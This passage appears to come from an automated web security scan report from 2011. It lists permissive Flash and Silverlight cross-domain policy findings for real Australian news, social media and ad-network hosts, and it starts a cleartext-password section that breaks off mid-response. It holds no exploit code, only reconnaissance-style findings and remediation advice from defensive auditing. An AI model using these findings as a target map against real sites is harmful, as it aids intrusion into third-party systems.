<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.59. http://pluck.abc.net.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pluck.abc.net.au
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pluck.abc.net.au

Response

HTTP/1.0 200 OK
Content-Length: 217
Content-Type: text/xml
Content-Location: http://pluck.abc.net.au/crossdomain.xml
Last-Modified: Mon, 22 Aug 2011 09:40:53 GMT
Accept-Ranges: bytes
ETag: "538de96af60cc1:1c8a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Wed, 07 Sep 2011 14:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="abc.net.au"/>
<allow-access-from domain="*.abc.net.au"/>
<allow-access-from domain="abc.com.au"/>
<allow-access-from domain="*.abc.com.au"/>
</cro
...[SNIP]...

3.60. http://resources.news.com.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://resources.news.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: resources.news.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 25 May 2011 00:05:10 GMT
ETag: "f1f565-4c5-4a40e7538d980"
Content-Type: text/xml
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=900
Expires: Wed, 07 Sep 2011 14:30:05 GMT
Date: Wed, 07 Sep 2011 14:15:05 GMT
Content-Length: 1221
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.news.com.au" />
   <allow-access-from domain="*.foxsports.com.au" />
   <allow-access-from domain="*.perthnow.com.au" />
   <allow-access-from domain="*.theaustralian.com.au" />
   <allow-access-from domain="*.dailytelegraph.com.au" />
   <allow-access-from domain="*.heraldsun.com.au" />
   <allow-access-from domain="*.couriermail.com.au" />
   <allow-access-from domain="*.adelaidenow.com.au" />
   <allow-access-from domain="*.themercury.com.au" />
   <allow-access-from domain="*.ntnews.com.au" />
   <allow-access-from domain="*.roo.com" />
   <allow-access-from domain="*.carsguide.com.au" />
   <allow-access-from domain="*.tiser.com.au" />
   <allow-access-from domain="*.vogue.com.au" />
   <allow-access-from domain="*.newsdigitalmedia.com.au" />
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.google.com"/>
...[SNIP]...

3.61. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.198
X-Cnection: close
Date: Wed, 07 Sep 2011 14:18:19 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.62. http://traktr.news.com.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://traktr.news.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: traktr.news.com.au

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "cc310451c6a77f7196c6fd35deb86d9b:1278978661"
Last-Modified: Thu, 19 Nov 2009 00:18:12 GMT
Accept-Ranges: bytes
Content-Length: 1521
Content-Type: application/xml
Cache-Control: max-age=3600
Date: Wed, 07 Sep 2011 14:14:32 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain
...[SNIP]...
<allow-access-from domain="*.news.com.au"/>
   <allow-access-from domain="*.foxsports.com.au"/>
   <allow-access-from domain="*.perthnow.com.au"/>
   <allow-access-from domain="*.theaustralian.com.au"/>
   <allow-access-from domain="*.dailytelegraph.com.au"/>
   <allow-access-from domain="*.heraldsun.com.au"/>
   <allow-access-from domain="*.couriermail.com.au"/>
   <allow-access-from domain="*.adelaidenow.com.au"/>
   <allow-access-from domain="*.themercury.com.au"/>
   <allow-access-from domain="*.ntnews.com.au"/>
   <allow-access-from domain="*.roo.com"/>
   <allow-access-from domain="*.carsguide.com.au"/>
   <allow-access-from domain="*.tiser.com.au"/>
   <allow-access-from domain="*.vogue.com.au"/>
   <allow-access-from domain="*.newsdigitalmedia.com.au"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m.au.2mdn.net"/>
   <allow-access-from domain="m1.au.2mdn.net"/>
   <allow-access-from domain="m1.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="m2.au.2mdn.net"/>
   <allow-access-from domain="67.228.97.188/flashcms"/>
   <allow-access-from domain="208.43.130.232/flashcms"/>
...[SNIP]...

3.63. http://webservice.theweather.com.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://webservice.theweather.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: webservice.theweather.com.au
Proxy-Connection: keep-alive
Referer: http://media.perthnow.com.au/multimedia/weatherWidget/5dayForecast/nopromo/WeatherWidget_11.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Wed, 03 Nov 2010 10:08:36 GMT
ETag: "ad0004-b53-49423397b7100"
Accept-Ranges: bytes
Content-Length: 2899
Content-Type: application/xml
Cache-Control: max-age=274
Expires: Wed, 07 Sep 2011 14:19:37 GMT
Date: Wed, 07 Sep 2011 14:15:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.all4u.tv"/>
<allow-access-from domain="*.beneful.com.au"/>
<allow-access-from domain="*.nestle.com.au"/>
<allow-access-from domain="*.purina.com.au"/>
<allow-access-from domain="*.redant.com.au"/>
<allow-access-from domain="*.byredant.com.au"/>
<allow-access-from domain="*.soi.net.au"/>
<allow-access-from domain="*.theweather.com.au"/>
<allow-access-from domain="*.yates.co.nz"/>
<allow-access-from domain="*.yates.com.au"/>
<allow-access-from domain="*.bemoneyconfident.com"/>
<allow-access-from domain="*.discovertasmania.com.au"/>
<allow-access-from domain="*.vicsnow.com"/>
<allow-access-from domain="*.bwm.com.au"/>
<allow-access-from domain="*.perthnow.com.au"/>
<allow-access-from domain="*.frostdesign.com.au"/>
<allow-access-from domain="*.kakadu.com.au"/>
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlastrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.awardwinning.com.au"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.mydove.com.au"/>
<allow-access-from domain="*.mydove.co.nz"/>
<allow-access-from domain="*.news.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.foxsports.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.perthnow.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.theaustralian.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dailytelegraph.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.heraldsun.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.couriermail.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adelaidenow.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.themercury.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.ntnews.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.roo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.carsguide.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tiser.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vogue.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.newsdigitalmedia.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...

3.64. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.152.41
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.65. http://www.smh.com.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.smh.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smh.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:51:53 GMT
ETag: "1459f09-558-48eb2c1c3cc40"
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:10 GMT
Content-Length: 1368
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.360video.com.au" />
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.brisbanetimes.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.drive.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.fairfax.com.au"/>
<allow-access-from domain="*.panoramicvideo.com.au" />
<allow-access-from domain="*.theage.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.watoday.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...

3.66. http://www.watoday.com.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.watoday.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.watoday.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:52:24 GMT
ETag: "4101b-539-48eb2c39cd200"
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 1337
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.360video.com.au" />
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.brisbanetimes.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.drive.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.panoramicvideo.com.au" />
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.theage.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...

3.67. http://www.wtp101.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtp101.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:29 GMT
ETag: 1300113893320
LastModified: Mon, 14 Mar 2011 14:44:53 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

3.68. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:06 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 07 Sep 2011 14:45:06 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

3.69. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher-rbc.bidder7.mookie1.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:05 GMT
ETag: "d18105-116-4ab73f1504140"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

4. Silverlight cross-domain policy previous next
There are 6 instances of this issue:

http://b.scorecardresearch.com/clientaccesspolicy.xml
http://feed.video.news.com.au/clientaccesspolicy.xml
http://pixel.quantserve.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml
http://s1.2mdn.net/clientaccesspolicy.xml
http://secure-au.imrworldwide.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Thu, 08 Sep 2011 14:14:17 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.2. http://feed.video.news.com.au/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.video.news.com.au
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: feed.video.news.com.au

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 262
Last-Modified: Thu, 04 Aug 2011 11:13:54 GMT
Server: Jetty(6.1.19)
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="*"/></allow-from><grant-to><resource path="/" include-subpaths="true
...[SNIP]...

4.3. http://pixel.quantserve.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Thu, 08 Sep 2011 14:14:09 GMT
Content-Type: text/xml
Content-Length: 312
Date: Wed, 07 Sep 2011 14:14:09 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

4.4. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:56:56 GMT
Expires: Wed, 07 Sep 2011 18:56:56 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69502

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.5. http://s1.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s1.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 07 Sep 2011 02:55:27 GMT
Expires: Thu, 08 Sep 2011 02:55:27 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 40800

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.6. http://secure-au.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-au.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:33 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 14 Sep 2011 14:14:33 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5. Cleartext submission of password previous next
There are 2 instances of this issue:

http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js
http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

The form contains the following password field:

'+y+'

Request

GET /res/libraries/pluck/abc.pluck-1.latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Feb 2011 00:41:45 GMT
ETag: "16545ae-6697-20d00440"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=6708
Expires: Wed, 07 Sep 2011 16:06:01 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 26263
Connection: close
